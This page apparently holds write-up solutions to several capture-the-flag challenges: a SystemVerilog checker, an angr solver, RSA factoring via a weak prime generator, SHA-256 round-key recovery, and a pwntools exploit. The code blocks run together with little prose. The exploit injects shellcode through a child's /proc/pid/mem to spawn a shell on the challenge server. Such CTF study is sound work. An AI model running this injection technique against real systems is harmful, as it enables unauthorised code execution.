Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
module check(
input clk,
input [6:0] data,
output wire open_safe
);
reg [6:0] memory [7:0];
reg [2:0] idx = 0;
wire [55:0] magic = {
{memory[0], memory[5]},
{memory[6], memory[2]},
{memory[4], memory[3]},
{memory[7], memory[1]}
};
wire [55:0] kittens = { magic[9:0], magic[41:22], magic[21:10], magic[55:42] };
assign open_safe = kittens == 56'd3008192072309708;
always_ff @(posedge clk) begin
memory[idx] <= data;
idx <= idx + 5;
for(int i = 0; i < 8; i = i+1) begin
$write("%b ", memory[i]);
end
end
endmoduleCreate an array of 8 x 7 bit fields (named memory)
Define a 7 bit input 'data'
Define a 56 bit array 'magic'
Read in a single 7 bit character, place it at memory[idx], then increase idx by 5. As idx is is a 3 bit field, this results in an overflow that shuffles the input order
The contents of memory is then shuffled in a fairly simple fashion into magic
The 56 bit wire 'kittens' is defined and filled with data from magic in a non-linear order $display("magic : %b", magic);
$display("kit : %b", kittens);
$display("Goal: %b", 56'd3008192072309708);import angr, claripy
target = angr.Project('a.out', auto_load_libs=False)
input_len = 15
inp = [claripy.BVS('flag_%d' %i, 8) for i in range(input_len)]
flag = claripy.Concat(*inp + [claripy.BVV(b'\n')])
desired = 0x0010111d
wrong = 0x00101100
st = target.factory.full_init_state(args=["./a.out"], stdin=flag)
for k in inp:
st.solver.add(k < 0x7f)
st.solver.add(k > 0x20)
sm = target.factory.simulation_manager(st)
sm.run()
y = []
for x in sm.deadended:
if b"SUCCESS" in x.posix.dumps(1):
y.append(x)
#grab the first ouptut
valid = y[0].posix.dumps(0)
print(valid)WARNING | 2020-08-24 02:21:03,963 | cle.loader | The main binary is a position-independent executable. It is being loaded with a base address of 0x400000.
[ ... SNIP ... ]
b'CTF{S1MDf0rM3!}\n'def prinh(a):
print(hex(a))
def cracc(n):
upper = n >> (2048-128)
u1 = upper >> 64
lower = n % 2**65
prinh(lower)
a2 = pow(0xe64a5f84e2762be5,-1,2**65)
for _ in range(30):
lower = pow(lower*a2,1,2**65)
prinh(lower)
z = hex(u1)[-16:] + hex(lower)[-16:]
return zimport gmpy2
import math
a = 0xe64a5f84e2762be5
chunk_size = 64
def gen_prime(s):
s |= 0xc000000000000001
p = 0
for _ in range(16):
p = (p << chunk_size) + s
s = a * s % 2**64
if gmpy2.is_prime(p):
return p
n = 0xab802dca026b18251449baece42ba2162bf1f8f5dda60da5f8baef3e5dd49d155c1701a21c2bd5dfee142fd3a240f429878c8d4402f5c4c7f4bc630c74a4d263db3674669a18c9a7f5018c2f32cb4732acf448c95de86fcd6f312287cebff378125f12458932722ca2f1a891f319ec672da65ea03d0e74e7b601a04435598e2994423362ec605ef5968456970cb367f6b6e55f9d713d82f89aca0b633e7643ddb0ec263dc29f0946cfc28ccbf8e65c2da1b67b18a3fbc8cee3305a25841dfa31990f9aab219c85a2149e51dff2ab7e0989a50d988ca9ccdce34892eb27686fa985f96061620e6902e42bdd00d2768b14a9eb39b3feee51e80273d3d4255f6b19
e = 0x10001
c = 0x6a12d56e26e460f456102c83c68b5cf355b2e57d5b176b32658d07619ce8e542d927bbea12fb8f90d7a1922fe68077af0f3794bfd26e7d560031c7c9238198685ad9ef1ac1966da39936b33c7bb00bdb13bec27b23f87028e99fdea0fbee4df721fd487d491e9d3087e986a79106f9d6f5431522270200c5d545d19df446dee6baa3051be6332ad7e4e6f44260b1594ec8a588c0450bcc8f23abb0121bcabf7551fd0ec11cd61c55ea89ae5d9bcc91f46b39d84f808562a42bb87a8854373b234e71fe6688021672c271c22aad0887304f7dd2b5f77136271a571591c48f438e6f1c08ed65d0088da562e0d8ae2dadd1234e72a40141429f5746d2d41452d916
bleh = [17323093358088416319, 11957115919933039605, 15301219884532198649, 14589535238740003363, 10091363333161070837, 14567509746395306455, 15648764542394866359, 15625139955456876315, 14898389259854230905, 14898389259854230905, 15625139955456876315, 15648764542394866359, 14567509746395306455, 10091363333161070837, 14589535238740003363, 15301219884532198649, 11642633479736017985, 9423396846760527157, 9883074741724455311, 13159516333377194255, 12330536802058217123]
for s in bleh:
try:
p = math.gcd(gen_prime(s),n)
q = n//p
tot = (p-1)*(q-1)
d = pow(e,-1,tot)
print(pow(c,d,n)) # long to bytes this after
except:passdef generate_random_round_keys(cnt: int):
res = {}
for i in range(cnt):
rk = 0
for b in os.urandom(4):
rk = rk * 256 + b
res[i] = rk
return res sha = sha256.SHA256()
round_keys = sha.k[:]
for i, v in secret_round_keys.items():
round_keys[i] = v
return sha.sha256(m, round_keys) def compression_step(self, state, k_i, w_i):
a, b, c, d, e, f, g, h = state
s1 = self.rotate_right(e, 6) ^ self.rotate_right(e, 11) ^ self.rotate_right(e, 25)
ch = (e & f) ^ (~e & g)
tmp1 = (h + s1 + ch + k_i + w_i) & 0xffffffff
s0 = self.rotate_right(a, 2) ^ self.rotate_right(a, 13) ^ self.rotate_right(a, 22)
maj = (a & b) ^ (a & c) ^ (b & c)
tmp2 = (tmp1 + s0 + maj) & 0xffffffff
tmp3 = (d + tmp1) & 0xffffffff
return (tmp2, a, b, c, tmp3, e, f, g)tmp1 = h + s1 + ch + k_i + w_i
tmp2 = tmp1 + s0 + maj
tmp3 = d + tmp1tmp1 = h + s1 + ch + k_i + w_i
tmp2 = h + s1 + ch + k_i + w_i + s0 + maj
tmp3 = h + s1 + ch + k_i + w_i + ddef getprev(state,k_i,w_i):
tmp2, a, b, c, tmp3, e, f, g = state
s1 = rotate_right(e, 6) ^ rotate_right(e, 11) ^ rotate_right(e, 25)
ch = (e & f) ^ (~e & g)
s0 = rotate_right(a, 2) ^ rotate_right(a, 13) ^ rotate_right(a, 22)
maj = (a & b) ^ (a & c) ^ (b & c)
tmp1 = (tmp2 - (s0 + maj)) % p
bleh = s1 + ch + k_i + w_i
h = (tmp1 - bleh) % p
d = (tmp3 - tmp1) % p
return [a,b,c,d,e,f,g,h][1779033703, 3144134277, 1013904242, 2773480762, 1359893119, 2600822924, 528734635, 1541459225] # initial state (pre-rounds)
[xxxxxxxxxx, 1779033703, 3144134277, 1013904242, xxxxxxxxxx, 1359893119, 2600822924, 528734635]
[xxxxxxxxxx, xxxxxxxxxx, 1779033703, 3144134277, xxxxxxxxxx, xxxxxxxxxx, 1359893119, 2600822924]
[xxxxxxxxxx, xxxxxxxxxx, xxxxxxxxxx, 1779033703, xxxxxxxxxx, xxxxxxxxxx, xxxxxxxxxx, 1359893119]
[2788502447, xxxxxxxxxx, xxxxxxxxxx, xxxxxxxxxx, xxxxxxxxxx, xxxxxxxxxx, xxxxxxxxxx, xxxxxxxxxx]
[ 523352746, 2788502447, xxxxxxxxxx, xxxxxxxxxx, 1827710523, xxxxxxxxxx, xxxxxxxxxx, xxxxxxxxxx]
[ 155539695, 523352746, 2788502447, xxxxxxxxxx, 277694853, 1827710523, xxxxxxxxxx, xxxxxxxxxx]
[3585474043, 155539695, 523352746, 2788502447, 4184759956, 277694853, 1827710523, xxxxxxxxxx]
[4286495597, 3585474043, 155539695, 523352746, 3141120170, 4184759956, 277694853, 1827710523] # 7th state[1779033703, 3144134277, 1013904242, 2773480762, 1359893119, 2600822924, 528734635, 1541459225] # inital state
[1348132138, 1779033703, 3144134277, 1013904242, xxxxxxxxxx, 1359893119, 2600822924, 528734635]
[2733599647, 1348132138, 1779033703, 3144134277, xxxxxxxxxx, xxxxxxxxxx, 1359893119, 2600822924]
[1127758716, 2733599647, 1348132138, 1779033703, xxxxxxxxxx, xxxxxxxxxx, xxxxxxxxxx, 1359893119]
[2788502447, 1127758716, 2733599647, 1348132138, xxxxxxxxxx, xxxxxxxxxx, xxxxxxxxxx, xxxxxxxxxx]
[ 523352746, 2788502447, 1127758716, 2733599647, 1827710523, xxxxxxxxxx, xxxxxxxxxx, xxxxxxxxxx]
[ 155539695, 523352746, 2788502447, 1127758716, 277694853, 1827710523, xxxxxxxxxx, xxxxxxxxxx]
[3585474043, 155539695, 523352746, 2788502447, 4184759956, 277694853, 1827710523, xxxxxxxxxx]
[4286495597, 3585474043, 155539695, 523352746, 3141120170, 4184759956, 277694853, 1827710523] # our 7th state def compression_step(self, state, k_i, w_i):
a, b, c, d, e, f, g, h = state
s1 = self.rotate_right(e, 6) ^ self.rotate_right(e, 11) ^ self.rotate_right(e, 25)
ch = (e & f) ^ (~e & g)
tmp1 = (h + s1 + ch + k_i + w_i) & 0xffffffff
s0 = self.rotate_right(a, 2) ^ self.rotate_right(a, 13) ^ self.rotate_right(a, 22)
maj = (a & b) ^ (a & c) ^ (b & c)
tmp2 = (tmp1 + s0 + maj) & 0xffffffff
tmp3 = (d + tmp1) & 0xffffffff
return (tmp2, a, b, c, tmp3, e, f, g)tmp1 = h + s1 + ch + k_i + w_i
tmp2 = h + s1 + ch + k_i + w_i + s0 + maj
tmp3 = h + s1 + ch + k_i + w_i + dtmp1 = temp + k_i
tmp2 = temp + k_i + s0 + maj
tmp3 = temp + k_i + ddef remove(matrix):
matrix[1][1] = 1779033703
matrix[2][2] = 1779033703
matrix[3][3] = 1779033703
matrix[1][2] = 3144134277
matrix[2][3] = 3144134277
matrix[1][3] = 1013904242
matrix[1][5] = 1359893119
matrix[2][6] = 1359893119
matrix[3][7] = 1359893119
matrix[1][6] = 2600822924
matrix[2][7] = 2600822924
matrix[1][7] = 528734635
return matrix
def solvepart2(matrix):
matrix = remove(matrix)
for i in range(4):
w_i = w[i+i]
a, b, c, d, e, f, g, h = matrix[i]
tmp2 = matrix[i+1][0]
s1 = rotate_right(e, 6) ^ rotate_right(e, 11) ^ rotate_right(e, 25)
ch = (e & f) ^ (~e & g)
s0 = rotate_right(a, 2) ^ rotate_right(a, 13) ^ rotate_right(a, 22)
maj = (a & b) ^ (a & c) ^ (b & c)
temp = s1 + ch + w_i
temp2 = s0 + maj
hki = (tmp2 - temp2) % p
tmp3 = (d + hki) % p
matrix[i+1][4] = tmp3
matrix[i+2][5] = tmp3
matrix[i+3][6] = tmp3
matrix[i+4][7] = tmp3
return matrixdef getkeys(sol):
keys = []
for i in range(8):
a, b, c, d, e, f, g, h = sol[i]
w_i = w[i]
s1 = rotate_right(e, 6) ^ rotate_right(e, 11) ^ rotate_right(e, 25)
ch = (e & f) ^ (~e & g)
thing = w_i + ch + s1 + d + h
value = sol[i+1][4]
key = (value - thing) % p
keys.append(key)
keys = [str(hex(x))[2:] for x in keys ]
return keysstate = [(x + y) & 0xffffffff for x, y in zip(state, s)]import struct
# rotate right function provided by server
def rotate_right(v, n):
w = (v >> n) | (v << (32 - n))
return w & 0xffffffff
# setting values to their actual value instead of our fake value
def remove(matrix):
matrix[1][1] = 1779033703
matrix[2][2] = 1779033703
matrix[3][3] = 1779033703
matrix[1][2] = 3144134277
matrix[2][3] = 3144134277
matrix[1][3] = 1013904242
matrix[1][5] = 1359893119
matrix[2][6] = 1359893119
matrix[3][7] = 1359893119
matrix[1][6] = 2600822924
matrix[2][7] = 2600822924
matrix[1][7] = 528734635
return matrix
## compute w for our particular message
# make sure its padded
def padding(m):
lm = len(m)
lpad = struct.pack('>Q', 8 * lm)
lenz = -(lm + 9) % 64
return m + bytes([0x80]) + bytes(lenz) + lpad
# get our w
def compute_w(m):
m = padding(m)
w = list(struct.unpack('>16L', m))
for _ in range(16, 64):
a, b = w[-15], w[-2]
s0 = rotate_right(a, 7) ^ rotate_right(a, 18) ^ (a >> 3)
s1 = rotate_right(b, 17) ^ rotate_right(b, 19) ^ (b >> 10)
s = (w[-16] + w[-7] + s0 + s1) & 0xffffffff
w.append(s)
return w
## constant values
start = [1779033703, 3144134277, 1013904242, 2773480762, 1359893119, 2600822924, 528734635, 1541459225]
k = [0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5, 0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5, 0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3, 0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174, 0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc, 0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da, 0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7, 0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967, 0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13, 0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85, 0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3, 0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070, 0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5, 0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3, 0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208, 0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2]
w = compute_w(b'Encoded with random keys')
## convert the hash into the last state of the message
def hash2nums(hashed):
state = []
x = [hashed[i:i+8] for i in range(0, len(hashed), 8)]
for i in range(len(x)):
j = x[i]
j = int(j,16)
j -= start[i]
state.append(j%p)
return state
## reversing the round when we have all info
def getprev(state,k_i,w_i):
tmp2, a, b, c, tmp3, e, f, g = state
s1 = rotate_right(e, 6) ^ rotate_right(e, 11) ^ rotate_right(e, 25)
ch = (e & f) ^ (~e & g)
s0 = rotate_right(a, 2) ^ rotate_right(a, 13) ^ rotate_right(a, 22)
maj = (a & b) ^ (a & c) ^ (b & c)
tmp1 = (tmp2 - (s0 + maj)) % p
bleh = s1 + ch + k_i + w_i
h = (tmp1 - bleh) % p
d = (tmp3 - tmp1) % p
return [a,b,c,d,e,f,g,h]
## get to the 7th state so we can grab our keys
def get27thstate(state):
states = []
for i in range(63,0,-1):
k_i = k[i]
w_i = w[i]
state = getprev(state,k_i,w_i)
if i <= 8:
states.append(state)
states.append(start)
return states
## when we get to round 7, we need to do other stuff, since we dont have all values
def solvepart2(matrix):
## remove all weird values
matrix = remove(matrix)
for i in range(4):
w_i = w[i+i]
a, b, c, d, e, f, g, h = matrix[i]
tmp2 = matrix[i+1][0]
s1 = rotate_right(e, 6) ^ rotate_right(e, 11) ^ rotate_right(e, 25)
ch = (e & f) ^ (~e & g)
s0 = rotate_right(a, 2) ^ rotate_right(a, 13) ^ rotate_right(a, 22)
maj = (a & b) ^ (a & c) ^ (b & c)
temp = s1 + ch + w_i
temp2 = s0 + maj
hki = (tmp2 - temp2) % p
tmp3 = (d + hki) % p
matrix[i+1][4] = tmp3
matrix[i+2][5] = tmp3
matrix[i+3][6] = tmp3
matrix[i+4][7] = tmp3
return matrix
## working out the key values to submit to the server
def getkeys(sol):
keys = []
for i in range(8):
a, b, c, d, e, f, g, h = sol[i]
w_i = w[i]
s1 = rotate_right(e, 6) ^ rotate_right(e, 11) ^ rotate_right(e, 25)
ch = (e & f) ^ (~e & g)
thing = w_i + ch + s1 + d + h
value = sol[i+1][4]
key = (value - thing) % p
keys.append(key)
keys = [str(hex(x))[2:] for x in keys ]
return keys
## final solve function
def solve(hashed):
state = hash2nums(hashed)
states = get27thstate(state)
sol = solvepart2(states[::-1])
keys = getkeys(sol)
print(f'Solution: {",".join(keys)}')
p = 4294967296 # we'll take everything mod this to get rid of the & with p-1
hash = "93dc2d9e92adc268ba4fcda976920d286389bd047de5c15f924e8cd1216a4666"
solve(hash)from pwn import *
context.arch = 'amd64'
e = ELF("./chal")
p = e.process() if args.LOCAL else remote('writeonly.2020.ctfcompetition.com', 1337)
p.recvuntil("[DEBUG] child pid: ")
pid = int(p.recvline())
p.clean()
filename = f"/proc/{pid}/mem".encode()
filename = filename.ljust(16,b'\x00')
code = ""
for i in range(0,len(filename),8):
num = hex(u64(filename[i:i+8]))
code = f"mov rbx,{num} ; push rbx ; " + code
code += "mov rbx,rsp ; mov rdi,rbx ; mov rax,2 ; mov rsi,0x2 ; syscall ; mov r9,rax ; mov rdi,rax ; mov rsi, 0x44fce8 ; mov rdx,0 ; mov rax,0x8 ; syscall; "
malcode = b"/bin/sh\x00" + asm("mov rdi, 0x44fce8 ; mov rsi,0 ; mov rdx,0 ; mov rax,0x3b ; syscall")
malcode = malcode.ljust(40,b'\x00')
newcode = ""
for i in range(0,len(malcode),8):
num = hex(u64(malcode[i:i+8]))
newcode = f"mov rbx,{num} ; push rbx ; " + newcode
code += newcode
code += "mov rdi,r9 ; mov rsi,rsp ; mov rdx,0x28 ; mov rax,0x1 ; syscall ; jmp $"
print(code)
shellcode = asm(code)
p.sendline(str(len(shellcode)))
p.sendline(shellcode)
p.interactive()